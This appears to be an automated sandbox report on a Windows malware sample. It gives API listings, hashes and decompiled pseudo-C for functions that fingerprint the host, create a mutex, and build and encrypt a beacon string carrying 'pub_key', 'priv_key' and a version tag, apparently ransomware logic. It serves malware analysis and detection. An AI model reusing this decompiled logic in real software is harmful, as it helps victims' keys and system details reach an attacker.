                                        • API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
                                        • String ID: %x%x$undefined
                                        • API String ID: 3872469520-3801831566
                                        • Opcode ID: f222761f4124e5e41ce50eba9895cdc82a3febf678536e779fec42ecabd81e0d
                                        • Instruction ID: 50238e5268f9147d1b3f3daddc1a401e90855ba7c8e95b1c6fec1adecca871f2
                                        • Opcode Fuzzy Hash: f222761f4124e5e41ce50eba9895cdc82a3febf678536e779fec42ecabd81e0d
                                        • Instruction Fuzzy Hash: E9518330106654B6DB233F6ACC4AFDF3A1CEFC6304F158050FB152419B8B699256DFAA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D4600 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0F9D39F0: GetProcessHeap.KERNEL32(?,?,0F9D4637,00000000,?,00000000,00000000), ref: 0F9D3A8C
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F9D7357
                                          • Part of subcall function 0F9D7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0F9D7368
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F9D7386
                                          • Part of subcall function 0F9D7330: GetComputerNameW.KERNEL32 ref: 0F9D7390
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0F9D73B0
                                          • Part of subcall function 0F9D7330: wsprintfW.USER32 ref: 0F9D73F1
                                          • Part of subcall function 0F9D7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F9D740E
                                          • Part of subcall function 0F9D7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F9D7432
                                          • Part of subcall function 0F9D7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0F9D4640,?), ref: 0F9D7456
                                          • Part of subcall function 0F9D7330: RegCloseKey.ADVAPI32(00000000), ref: 0F9D7472
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                          • Part of subcall function 0F9D7140: lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D465C
                                        • lstrcpyW.KERNEL32 ref: 0F9D467F
                                        • lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D4686
                                        • CreateMutexW.KERNELBASE(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D469E
                                        • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46AA
                                        • GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46B1
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D46CB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
                                        • String ID: Global\
                                        • API String ID: 3131499543-188423391
                                        • Opcode ID: 91c9ba5e8016759d1d33f44c45847dda1f1c19209f221feeb9f128592384ed4e
                                        • Instruction ID: 7d452d390671e7f075607f68ebe5ffd14b81f1648f188002da5812e2c0d33988
                                        • Opcode Fuzzy Hash: 91c9ba5e8016759d1d33f44c45847dda1f1c19209f221feeb9f128592384ed4e
                                        • Instruction Fuzzy Hash: B12138316543117BF234A768DC4AF7F765CDB80B55FB00628F606660C2EAE87D14C6EA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D7C10 Relevance: 12.6, APIs: 10, Instructions: 67COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 193 f9d7c10-f9d7c1d 194 f9d7c1f-f9d7c29 VirtualFree 193->194 195 f9d7c2b-f9d7c2f 193->195 194->195 196 f9d7c3d-f9d7c41 195->196 197 f9d7c31-f9d7c3b VirtualFree 195->197 198 f9d7c4f-f9d7c53 196->198 199 f9d7c43-f9d7c4d VirtualFree 196->199 197->196 200 f9d7c55-f9d7c5f VirtualFree 198->200 201 f9d7c61-f9d7c65 198->201 199->198 200->201 202 f9d7c67-f9d7c71 VirtualFree 201->202 203 f9d7c73-f9d7c77 201->203 202->203 204 f9d7c79-f9d7c83 VirtualFree 203->204 205 f9d7c85-f9d7c89 203->205 204->205 206 f9d7c8b-f9d7c95 VirtualFree 205->206 207 f9d7c97-f9d7c9b 205->207 206->207 208 f9d7c9d-f9d7ca7 VirtualFree 207->208 209 f9d7ca9-f9d7cad 207->209 208->209 210 f9d7caf-f9d7cb9 VirtualFree 209->210 211 f9d7cbb-f9d7cc2 209->211 210->211 212 f9d7cc4-f9d7cd1 VirtualFree 211->212 213 f9d7cd3-f9d7cd5 211->213 212->213
                                        C-Code - Quality: 100%
                                        			E0F9D7C10(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}





                                        0x0f9d7c11
                                        0x0f9d7c1d
                                        0x0f9d7c29
                                        0x0f9d7c29
                                        0x0f9d7c2f
                                        0x0f9d7c3b
                                        0x0f9d7c3b
                                        0x0f9d7c41
                                        0x0f9d7c4d
                                        0x0f9d7c4d
                                        0x0f9d7c53
                                        0x0f9d7c5f
                                        0x0f9d7c5f
                                        0x0f9d7c65
                                        0x0f9d7c71
                                        0x0f9d7c71
                                        0x0f9d7c77
                                        0x0f9d7c83
                                        0x0f9d7c83
                                        0x0f9d7c89
                                        0x0f9d7c95
                                        0x0f9d7c95
                                        0x0f9d7c9b
                                        0x0f9d7ca7
                                        0x0f9d7ca7
                                        0x0f9d7cad
                                        0x0f9d7cb9
                                        0x0f9d7cb9
                                        0x0f9d7cc2
                                        0x00000000
                                        0x0f9d7cd1
                                        0x0f9d7cd5

                                        APIs
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C29
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C3B
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C4D
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C5F
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C71
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C83
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7C95
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7CA7
                                        • VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7CB9
                                        • VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F9D46DA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7CD1
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FreeVirtual
                                        • String ID:
                                        • API String ID: 1263568516-0
                                        • Opcode ID: 79308fede0dd34f7c785c521a96fb6aa572d869fe66738e1eea17ab525b50520
                                        • Instruction ID: 2dde35d49bffbb49bbc6d1cf7c7ad688f88bf9823c385c9e0f5936e06ac3d16e
                                        • Opcode Fuzzy Hash: 79308fede0dd34f7c785c521a96fb6aa572d869fe66738e1eea17ab525b50520
                                        • Instruction Fuzzy Hash: A0211F30240B04AEE7762A25DD0AFA6B2E5BB40B45F758828F2C1245F18BF57499DF08
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D72B0 Relevance: 7.5, APIs: 5, Instructions: 47registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        C-Code - Quality: 100%
                                        			E0F9D72B0(void* __ecx, void* _a4, int _a8, short* _a12, char* _a16, short* _a20) {
				void* _v8;
				long _t14;
				long _t18;

				_t14 = RegOpenKeyExW(_a4, _a8, 0, 0x20019,  &_v8); // executed
				if(_t14 != 0) {
					return 0;
				} else {
					_a8 = _a20;
					_t18 = RegQueryValueExW(_v8, _a12, 0, 0, _a16,  &_a8); // executed
					if(_t18 != 0) {
						GetLastError();
						RegCloseKey(_v8);
						return 0;
					} else {
						_t11 = _t18 + 1; // 0x1, executed
						RegCloseKey(_v8); // executed
						return _t11;
					}
				}
			}






                                        0x0f9d72c6
                                        0x0f9d72d0
                                        0x0f9d7324
                                        0x0f9d72d2
                                        0x0f9d72d5
                                        0x0f9d72e7
                                        0x0f9d72ef
                                        0x0f9d7306
                                        0x0f9d730f
                                        0x0f9d731b
                                        0x0f9d72f1
                                        0x0f9d72f4
                                        0x0f9d72f7
                                        0x0f9d7303
                                        0x0f9d7303
                                        0x0f9d72ef

                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(?,?,00000000,00020019,?,?,0000060C,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D72C6
                                        • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,00000080,?,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D72E7
                                        • RegCloseKey.KERNELBASE(?,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D72F7
                                        • GetLastError.KERNEL32(?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D7306
                                        • RegCloseKey.ADVAPI32(?,?,0F9D7725,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0F9D730F
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$ErrorLastOpenQueryValue
                                        • String ID:
                                        • API String ID: 2437438455-0
                                        • Opcode ID: af505a80bcd8e54166c52c55d3e20a9edc2653fe9ba8d75e764162b63f563ba6
                                        • Instruction ID: 94ab027d20f8a07a38f8fb476f74b7d571647572b9bf46a2f79076786ac883c3
                                        • Opcode Fuzzy Hash: af505a80bcd8e54166c52c55d3e20a9edc2653fe9ba8d75e764162b63f563ba6
                                        • Instruction Fuzzy Hash: BE011A3260511DEBDB119F94ED09D9ABB6CEB09362B108166FD05D6111D7329A34AFE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0F9D4BF0 Relevance: 3.0, APIs: 2, Instructions: 25threadCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 219 f9d4bf0-f9d4c29 CreateThread 221 f9d4c2b-f9d4c2f FindCloseChangeNotification 219->221 222 f9d4c35-f9d4c3b 219->222 221->222
                                        C-Code - Quality: 100%
                                        			_entry_(intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t10;

				_v16 = 1;
				_v12 = _a8;
				_t10 = CreateThread(0, 0, E0F9D4950, 0, 0, 0); // executed
				_v8 = _t10;
				if(_v8 != 0) {
					FindCloseChangeNotification(_v8); // executed
				}
				return _v16;
			}







                                        0x0f9d4bf6
                                        0x0f9d4c00
                                        0x0f9d4c1c
                                        0x0f9d4c22
                                        0x0f9d4c29
                                        0x0f9d4c2f
                                        0x0f9d4c2f
                                        0x0f9d4c3b

                                        APIs
                                        • CreateThread.KERNELBASE ref: 0F9D4C1C
                                        • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0F9D4C2F
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ChangeCloseCreateFindNotificationThread
                                        • String ID:
                                        • API String ID: 4060959955-0
                                        • Opcode ID: 48cb12911a711d1e0ae6269b98b08b4a26e368db564743880a3633a6e7b456da
                                        • Instruction ID: 70925dfa41bdb85fd63494aa49d68d5455b6cc1a7395b84163fd23db5c34ad49
                                        • Opcode Fuzzy Hash: 48cb12911a711d1e0ae6269b98b08b4a26e368db564743880a3633a6e7b456da
                                        • Instruction Fuzzy Hash: 16F03934A48308FBE720DFA4D90AB8CB774EB04705F30809AFA016B2C1D6B56690CB48
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 0F9D5880 Relevance: 87.9, APIs: 45, Strings: 5, Instructions: 416stringmemoryencryptionCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 228 f9d5880-f9d590c call f9d39f0 call f9d7330 call f9d7140 VirtualAlloc 235 f9d590e-f9d5910 228->235 236 f9d5921-f9d5925 228->236 235->236 237 f9d5912-f9d591f 235->237 238 f9d5927-f9d5936 236->238 237->238 239 f9d594f-f9d5951 238->239 240 f9d5938-f9d593d 238->240 242 f9d5955-f9d595e 239->242 240->239 241 f9d593f-f9d594d 240->241 241->242 243 f9d596d-f9d596f 242->243 244 f9d5960-f9d596b 242->244 245 f9d5973-f9d5975 243->245 244->243 244->245 246 f9d597b-f9d59f8 CryptBinaryToStringA * 2 lstrlenA * 2 VirtualAlloc lstrlenA 245->246 247 f9d5d44 245->247 248 f9d5a0f 246->248 249 f9d59fa-f9d59fc 246->249 250 f9d5d4a 247->250 252 f9d5a17-f9d5a20 lstrlenA 248->252 249->248 251 f9d59fe-f9d5a0d 249->251 253 f9d5d4f-f9d5d6d VirtualFree call f9d7c10 250->253 251->252 254 f9d5a2a 252->254 255 f9d5a22-f9d5a28 252->255 257 f9d5a32-f9d5a3c lstrlenA 254->257 255->254 255->257 259 f9d5a3e-f9d5a4a 257->259 260 f9d5a72-f9d5a79 lstrlenA 257->260 263 f9d5a50-f9d5a55 259->263 261 f9d5a7b-f9d5a7f 260->261 262 f9d5aa1-f9d5b68 lstrcatW lstrlenW call f9d6f40 lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW lstrlenA MultiByteToWideChar lstrcatW lstrlenW VirtualAlloc lstrlenW 260->262 264 f9d5a83-f9d5a88 261->264 274 f9d5b6a-f9d5b6c 262->274 275 f9d5b74-f9d5b76 262->275 266 f9d5a57-f9d5a59 263->266 267 f9d5a62-f9d5a6c lstrlenA 263->267 268 f9d5a8a-f9d5a8c 264->268 269 f9d5a95-f9d5a9f lstrlenA 264->269 266->267 271 f9d5a5b-f9d5a5e 266->271 267->263 272 f9d5a6e 267->272 268->269 273 f9d5a8e-f9d5a91 268->273 269->262 269->264 271->267 272->260 273->269 274->275 276 f9d5b6e-f9d5b72 274->276 277 f9d5b7a-f9d5c2e lstrlenW call f9d9010 lstrlenA call f9d5d70 call f9d5e20 CryptBinaryToStringA 275->277 276->277 284 f9d5c36-f9d5c5c lstrlenA VirtualAlloc lstrlenA 277->284 285 f9d5c30 GetLastError 277->285 286 f9d5c5e-f9d5c64 284->286 287 f9d5c66 284->287 285->284 286->287 288 f9d5c6e-f9d5c75 lstrlenA 286->288 287->288 289 f9d5c9e-f9d5cd4 lstrlenA MultiByteToWideChar call f9d54a0 288->289 290 f9d5c77-f9d5c7f 288->290 296 f9d5d07-f9d5d0d 289->296 297 f9d5cd6-f9d5d05 VirtualFree * 3 289->297 291 f9d5c80-f9d5c85 290->291 293 f9d5c87-f9d5c89 291->293 294 f9d5c92-f9d5c9c lstrlenA 291->294 293->294 298 f9d5c8b-f9d5c8e 293->298 294->289 294->291 299 f9d5d0f-f9d5d12 296->299 300 f9d5d14-f9d5d42 VirtualFree * 3 296->300 297->253 298->294 299->300 300->250
                                        C-Code - Quality: 78%
                                        			E0F9D5880(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v295;
				char _v296;
				char _v404;
				char _v408;
				void* _v428;
				CHAR* _v432;
				int _v436;
				int _v440;
				char _v442;
				CHAR* _v444;
				short _v448;
				int _v452;
				char _v456;
				CHAR* _v464;
				int _v468;
				void* _v472;
				BYTE* _v476;
				WCHAR* _v480;
				WCHAR* _v484;
				void* _v488;
				void* _v492;
				short* _v496;
				CHAR* _v500;
				void* _v504;
				long _v508;
				CHAR* _v512;
				CHAR* _v528;
				CHAR* _t133;
				void* _t135;
				int _t145;
				void* _t148;
				int _t149;
				void* _t150;
				void* _t152;
				signed int _t159;
				signed int _t163;
				void* _t170;
				signed int _t172;
				CHAR* _t185;
				long _t189;
				intOrPtr _t199;
				int _t200;
				void _t202;
				int _t203;
				void _t204;
				int _t205;
				long _t213;
				void* _t219;
				short _t228;
				char* _t229;
				WCHAR* _t231;
				short _t233;
				CHAR* _t234;
				char _t235;
				void* _t238;
				long _t240;
				long _t241;
				void* _t243;
				void* _t245;
				short _t248;
				int _t249;
				void* _t255;
				CHAR* _t256;
				WCHAR* _t258;
				WCHAR* _t259;
				signed int _t261;
				CHAR* _t262;
				CHAR* _t263;
				signed int _t266;
				int _t267;
				void* _t268;
				long _t271;
				void* _t272;
				void* _t273;
				long _t279;
				int _t280;
				long _t281;
				void* _t282;
				CHAR* _t283;
				short _t284;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v456 = __ecx;
				_v436 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(1);
				_push(__ecx);
				_push(1);
				E0F9D39F0( &_v404);
				E0F9D7330( &_v492, __edx);
				_t255 = E0F9D7140( &_v492);
				_t266 = _a8 + __edx;
				_t7 = _t266 + 8; // 0x8
				_t213 = _t255 + _t7 * 8 << 3;
				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40);
				_t248 = 0;
				_v512 = _t133;
				_v528 = _t133;
				_t228 = 0x30 + (_t255 + _t266 * 4) * 8;
				if(_t133 == 0 || _t228 >= _t213) {
					_v448 = _t248;
					_t256 = _t133;
				} else {
					_t256 =  &(_t133[_t228]);
					_v448 = _t133;
					_v444 = _t256;
					_t248 = _t228;
				}
				_t135 = 2 + _a8 * 8;
				if(_v428 == 0) {
					L7:
					_t229 = 0;
					_v432 = 0;
				} else {
					_t284 = _t248 + _t135;
					if(_t284 >= _t213) {
						goto L7;
					} else {
						_t229 = _t256;
						_v432 = _t256;
						_t256 =  &(_t256[_t135]);
						_t248 = _t284;
						_v444 = _t256;
					}
				}
				_t267 = _v440;
				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
					_t256 = 0;
					_v444 = 0;
				}
				if(_t229 == 0) {
					goto L53;
				} else {
					_t249 = _a8;
					_v436 = _t249 + _t249;
					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
					_v452 = _t267 + _t267;
					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
					_t145 = lstrlenA(_t256);
					_t271 = _t145 + lstrlenA(_v464) + 0x42;
					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40);
					_v472 = _t148;
					_v488 = _t148;
					_v492 = 0;
					_t149 = lstrlenA(_v464);
					_t231 = _v472;
					_t150 = _t149 + 1;
					if(_t231 == 0 || _t150 >= _t271) {
						_v484 = 0;
					} else {
						_v492 = _t150;
						_v488 = _t231 + _t150;
						_v484 = _t231;
					}
					_t152 = lstrlenA(_t256) + 1;
					if(_v472 == 0 || _t152 + _v492 >= _t271) {
						_v488 = 0;
					}
					_t272 = 0;
					if(lstrlenA(_v464) != 0) {
						_t245 = _v484;
						_t263 = _v464;
						_v492 = _t245;
						do {
							_t204 =  *((intOrPtr*)(_t272 + _t263));
							if(_t204 != 0xa && _t204 != 0xd) {
								 *_t245 = _t204;
								_v492 = _t245 + 1;
							}
							_t272 = _t272 + 1;
							_t205 = lstrlenA(_t263);
							_t245 = _v492;
						} while (_t272 < _t205);
						_t256 = _v476;
					}
					_t273 = 0;
					if(lstrlenA(_t256) != 0) {
						_t243 = _v488;
						_v492 = _t243;
						do {
							_t202 =  *((intOrPtr*)(_t273 + _t256));
							if(_t202 != 0xa && _t202 != 0xd) {
								 *_t243 = _t202;
								_v492 = _t243 + 1;
							}
							_t273 = _t273 + 1;
							_t203 = lstrlenA(_t256);
							_t243 = _v492;
						} while (_t273 < _t203);
					}
					_t258 = _v480;
					lstrcatW(_t258, L"action=call&");
					_t259 =  &(_t258[lstrlenW(_t258)]);
					E0F9D6F40( &_v440, _t259);
					lstrcatW(_t259, L"&pub_key=");
					_t159 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
					lstrcatW(_t259, L"&priv_key=");
					_t163 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
					lstrcatW(_t259, L"&version=2.3r");
					_t279 = (lstrlenW(_v484) << 4) + 0x12;
					_t219 = VirtualAlloc(0, _t279, 0x3000, 0x40);
					_v480 = _t219;
					_t170 = 2 + lstrlenW(_v484) * 8;
					if(_t219 == 0 || _t170 >= _t279) {
						_v492 = 0;
					} else {
						_v492 = _t219;
					}
					_t172 = lstrlenW(_v480);
					_t233 = "#shasj"; // 0x61687323
					_t261 = _t172;
					asm("movq xmm0, [0xf9dfc78]");
					_v448 = _t233;
					_t234 =  *0xf9dfc84; // 0x6a73
					_v444 = _t234;
					_t235 =  *0xf9dfc86; // 0x0
					asm("movq [esp+0x3c], xmm0");
					_v442 = _t235;
					_v296 = 0;
					E0F9D9010( &_v295, 0, 0xff);
					E0F9D5D70( &_v296,  &_v456, lstrlenA( &_v456));
					_t280 = _t261 + _t261;
					E0F9D5E20( &_v296, _v480, _t280);
					_t262 = _v492;
					_v468 = _t261 * 8;
					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
						GetLastError();
					}
					_t105 = lstrlenA(_t262) + 2; // 0x2
					_t281 = _t105;
					_v504 = VirtualAlloc(0, _t281, 0x3000, 0x40);
					_t107 = lstrlenA(_t262) + 1; // 0x1
					_t238 = _t107;
					_t185 = _v504;
					if(_t185 == 0) {
						L40:
						_v500 = 0;
					} else {
						_v500 = _t185;
						if(_t238 >= _t281) {
							goto L40;
						}
					}
					_t282 = 0;
					if(lstrlenA(_t262) != 0) {
						_t241 = _v500;
						_v508 = _t241;
						do {
							_t199 =  *((intOrPtr*)(_t282 + _t262));
							if(_t199 != 0xa && _t199 != 0xd) {
								 *_t241 = _t199;
								_v508 = _t241 + 1;
							}
							_t282 = _t282 + 1;
							_t200 = lstrlenA(_t262);
							_t241 = _v508;
						} while (_t282 < _t200);
					}
					_t283 = _v500;
